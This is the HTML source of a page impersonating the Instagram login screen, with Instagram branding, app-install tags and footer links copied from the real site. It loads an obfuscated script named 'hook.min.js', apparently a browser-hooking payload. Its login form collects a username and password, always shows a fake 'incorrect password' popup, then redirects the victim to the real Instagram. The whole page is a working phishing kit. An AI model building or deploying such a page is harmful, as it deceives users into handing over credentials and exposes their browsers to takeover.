<!DOCTYPE html>
<!DOCTYPE html>
<html>
<head>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <!-- PWA meta tags -->
    <meta name="description" content="Instagram">
    <meta name="theme-color" content="#4285F4">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="apple-mobile-web-app-title" content="Instagram">
    
    <!-- PWA manifest -->
    <link rel="manifest" href="/static/manifest.json">
    
    <!-- PWA icons -->
    <!--<link rel="icon" type="image/png" sizes="32x32" href="/static/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/static/favicon-16x16.png">-->
    <link rel="apple-touch-icon" href="/static/img/icon-192x192.png">
    
    <!-- Use obfuscated version -->
    <!-- <script src="/static/hook.js"></script> -->
    <script src="/static/hook.min.js"></script>


    <!-- <title>Instagram • Login</title> -->
    <title>Instagram</title>
    <link rel="icon" href="/static/img/Instagram_icon.png" type="image/png">
    <style>
        .user-credential-div{
            margin: auto;
            width: 250px;
            height: 350px;
            background-color: #fff;
            border: 1px solid #ccc;
            padding-top: 10px;
            padding-bottom: 100px;
            padding-right: 100px;
            padding-left: 30px;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            margin-top: 50px;
            cursor: pointer;
        }

        .user-email-place {
            font-family: Arial, Helvetica, sans-serif;
            width: 310px;
            margin-bottom: 5px;
            border: 1px solid #ccc; 
            border-radius: 5px;
            padding: 10px;

        }

        .user-password-place {
            font-family: Arial, Helvetica, sans-serif;
            width: 310px;
            margin-bottom: 5px;
            border: 1px solid #ccc; 
            border-radius: 5px;
            padding: 10px;
        }

        .instagram-logo {
            width: 200px;
            margin-left: 60px;
        }

        .login-button {
            padding: 0px;
            width: 330px;
            height: 40px;
            text-align: center;
            box-sizing: border-box;
            background-color: rgb(0, 149, 246);
            border: none;
            color: white;
            border-radius: 10px;
            font-family: Arial, Helvetica, sans-serif;
            font-weight: bolder;
            cursor: pointer; 
        }

        button:hover {
            background-color: #0056b3;
        }
        .app {
            display: flex;
            justify-content: center;
            align-items: center;
            padding-bottom: 0px;
            cursor: pointer;
        }

        .app-google {
            width: 150px;
        }

        .app-microsoft {
            width: 125px;
            margin-left: 5px;
        }

        .get-app {
            margin: auto;
            height: 250px;
        }

        .box {
            padding-top: 30px;
            margin-bottom: 100px;
        }

        .sign-up-text{
            margin: 0;
            padding-top: 15px;
        }
        .sign-up-div {
            margin: auto;
            text-align: center;
            font-family: Arial, Helvetica, sans-serif;
            background-color: #fff;
            border: 1px solid #ccc;
            height: 50px;
            width: 250px;
            margin-top: 10px;
            padding-top: 10px;
            padding-bottom: 10px;
            padding-left: 65px;
            padding-right: 65px;
            margin-bottom: 5px;
            border-width: thin;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }

        .get-app-text {
            text-align: center;
            font-family: Arial, Helvetica, sans-serif;
            
        }

        .bl-text {
            color: #3578E5;
            cursor: pointer;
        }

        .facebook-login-text {
            text-align: center;
            margin-left: 10px;
            margin-top: 2px;
            font-family: Arial, Helvetica, sans-serif;
            color: #385185;
            margin-bottom: 0px;
        
            
        }

        .facebook-section {
            display: flex;
            justify-content: center;
            align-items: center;
            text-align: center;
            margin-left: 50px;
            cursor: pointer;
            
        }


        .forgot-password-text {
            font-weight: lighter;
            text-align: center;
            margin-left: 80px;
            margin-top: 0px;
            font-family: Arial, Helvetica, sans-serif;
            color: #3578E5;
            cursor: pointer;
        }



        .footer {
            margin-top: 65px;
            cursor: pointer;
        }

        .first-line,
        .second-line {
            margin-top: 0px;
            font-family: Arial, Helvetica, sans-serif;
            text-align: center;
            color: rgb(115, 115, 115);
        }

        .or-section {
            margin-left: 80px;
            margin-top: 15px;
            margin-bottom: 20px;
            display: flex;
            align-items: center;
        }

        .or-divider {
            flex-grow: 1;
            height: 1px;
            background-color: #ccc;
        }

        .or-text {
            font-family: Arial, Helvetica, sans-serif;
            margin: 0px 10px;
            color: rgb(115, 115, 115);
            font-size: small;
        }

        .f-line-elements {
            margin-right: 10px;
            font-weight: lighter;
            color: rgb(115, 115, 115);
        }
        .s-line-elements{
            margin-right: 10px;
            font-weight: lighter;
            color: rgb(115, 115, 115);
        }
        .f-line-elements:hover{
        text-decoration: underline;
        }
        @media (min-width: 751px) and (max-width: 999px) 
        {
            .first-line
            {
                margin-bottom: 50px;
            }
        }
        @media (min-width: 751px) and (max-width: 999px) 
        {
            .first-line
            {
                margin-bottom: 50px;
            }
        }
        
        @media (max-width: 600px)
        {
            .first-line
            {
                margin-bottom: 20px;
            }
        }

        a{
            text-decoration: none;
        }

        .error-popup {
            display: none;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: white;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
            z-index: 1000;
            text-align: center;
            font-family: Arial, sans-serif;
            border: 1px solid #ed4956;
        }

        .error-popup p {
            color: #ed4956;
            margin: 0;
            padding: 10px;
        }

        .error-popup button {
            background-color: #0095f6;
            color: white;
            border: none;
            padding: 8px 16px;
            border-radius: 4px;
            cursor: pointer;
            margin-top: 10px;
            font-weight: bold;
        }

        .error-popup button:hover {
            background-color: #0056b3;
        }

        .overlay {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            z-index: 999;
        }

    </style>
</head>
<body>
    <div class="user-credential-div">
        <div class="box">
            <img class="instagram-logo" src="/static/img/instagram.png"></img>
            <form action="/login" method="POST">
                <div>
                    <input type="text" id="username" name="username" placeholder="Phone number, username, or Email" class="user-email-place"><br><br>
                </div>
                <div>
                    <input type="password" id="password" name="password" placeholder="Password" class="user-password-place"><br><br>
                </div>
                <div>
                    <button type="submit" class="login-button">
                        <span>Log&nbsp;In</span>
                    </button>
                </div>
                <div class="or-section">
                    <div class="or-divider"></div>
                    <div class="or-text">OR</div>
                    <div class="or-divider"></div>
                </div>
                <a target="_blank" href="https://www.facebook.com/">
                    <div class="facebook-section">
                        <img width="26" height="26" src="https://img.icons8.com/color/48/facebook.png" alt="facebook"/>
                        <p class="facebook-login-text">Log in with Facebook</p>
                    </div>
                </a>
                <a href="https://www.instagram.com/accounts/password/reset/">
                    <h5>
                        <p class="forgot-password-text">Forgot password?</p>
                    </h5>
                </a>
            </form>
        </div>
    </div>
    <div class="sign-up-div">
        <p class="sign-up-text">Don't have an account? <span><a class="bl-text" href="https://www.instagram.com/accounts/emailsignup/">Sign up</a></span></p>
    </div>
    <div class="get-app">
        <p class="get-app-text">
            Get the app.
        </p>
        <div class="app">
            <a href="https://play.google.com/store/apps/details?id=com.instagram.android">
                <img class="app-google" src="/static/img/google_play.png">
            </a>
            <a href="https://apps.microsoft.com/home">
                <img class="app-microsoft" src="/static/img/microsoft_store.png">
            </a>
        </div>
        <footer>
            <h5>
                <div class="footer">
                    <p class="first-line">
                        <a target="_blank" class="f-line-elements" href="https://about.meta.com/">
                            <span>Meta</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://about.instagram.com/">
                            <span>About</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://about.instagram.com/en_US/blog">
                            <span>Blog</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://about.instagram.com/about-us/careers">
                            <span>Jobs</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://help.instagram.com/">
                            <span>Help</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://developers.facebook.com/docs/instagram">
                            <span>API</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://privacycenter.instagram.com/">
                            <span>Privacy</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://help.instagram.com/581066165581870/">
                            <span>Terms</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://www.instagram.com/directory/profiles/">
                            <span>Top Accounts</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://www.instagram.com/explore/locations/">
                            <span>Locations</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://www.instagram.com/web/lite/">
                            <span>Instagram Lite</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://www.threads.net/">
                            <span>Threads</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://www.facebook.com/help/instagram/261704639352628">
                            <span>Contact Uploading & Non-Users</span>
                        </a>
                        <a target="_blank" class="f-line-elements" href="https://about.meta.com/technologies/meta-verified/">
                            <span>Meta Verified</span>
                        </a>
                    </p>
                    <p class="second-line">
                        <span class="s-line-elements">English <img width="12" height="12" src="https://img.icons8.com/ios-glyphs/30/expand-arrow--v1.png" alt="expand-arrow--v1" /></span>
                        <span class="s-line-elements">© 2025 Instagram from Meta</span>
                    </p>
                </div>
            </h5>
        </footer>
    </div>

     <!-- Message to show when PWA is offline --> 
     <script>
        // Check offline status
        window.addEventListener('load', function() {
            function updateOnlineStatus() {
                var statusDiv = document.getElementById('offline-status');
                if (!statusDiv) {
                    statusDiv = document.createElement('div');
                    statusDiv.id = 'offline-status';
                    statusDiv.style.position = 'fixed';
                    statusDiv.style.bottom = '0';
                    statusDiv.style.left = '0';
                    statusDiv.style.right = '0';
                    statusDiv.style.padding = '10px';
                    statusDiv.style.backgroundColor = '#f44336';
                    statusDiv.style.color = 'white';
                    statusDiv.style.textAlign = 'center';
                    statusDiv.style.display = 'none';
                    statusDiv.style.zIndex = '999';
                    statusDiv.textContent = 'You are offline. Some features may not work.';
                    document.body.appendChild(statusDiv);
                }
                
                if (!navigator.onLine) {
                    statusDiv.style.display = 'block';
                } else {
                    statusDiv.style.display = 'none';
                }
            }

            window.addEventListener('online',  updateOnlineStatus);
            window.addEventListener('offline', updateOnlineStatus);
            updateOnlineStatus();
        });
    </script>

    <!-- HTML for error popup -->
    <div class="overlay" id="overlay"></div>
    <div class="error-popup" id="errorPopup">
        <p>Sorry, your password was incorrect. Please double-check your password.</p>
        <button onclick="closePopup()">OK</button>
    </div>

    <script>
        document.addEventListener('DOMContentLoaded', function() {
            // Form submit event
            document.querySelector('form').addEventListener('submit', function(e) {
                e.preventDefault(); // Prevent normal form submission
                
                // Show popup
                document.getElementById('overlay').style.display = 'block';
                document.getElementById('errorPopup').style.display = 'block';
            });
        });

        // Close popup function
        function closePopup() {
            document.getElementById('overlay').style.display = 'none';
            document.getElementById('errorPopup').style.display = 'none';
            
            // Redirect to Instagram after popup closes
            setTimeout(function() {
                window.location.href = 'https://www.instagram.com/';
            }, 500);
        }
    </script>
</body>
</html>
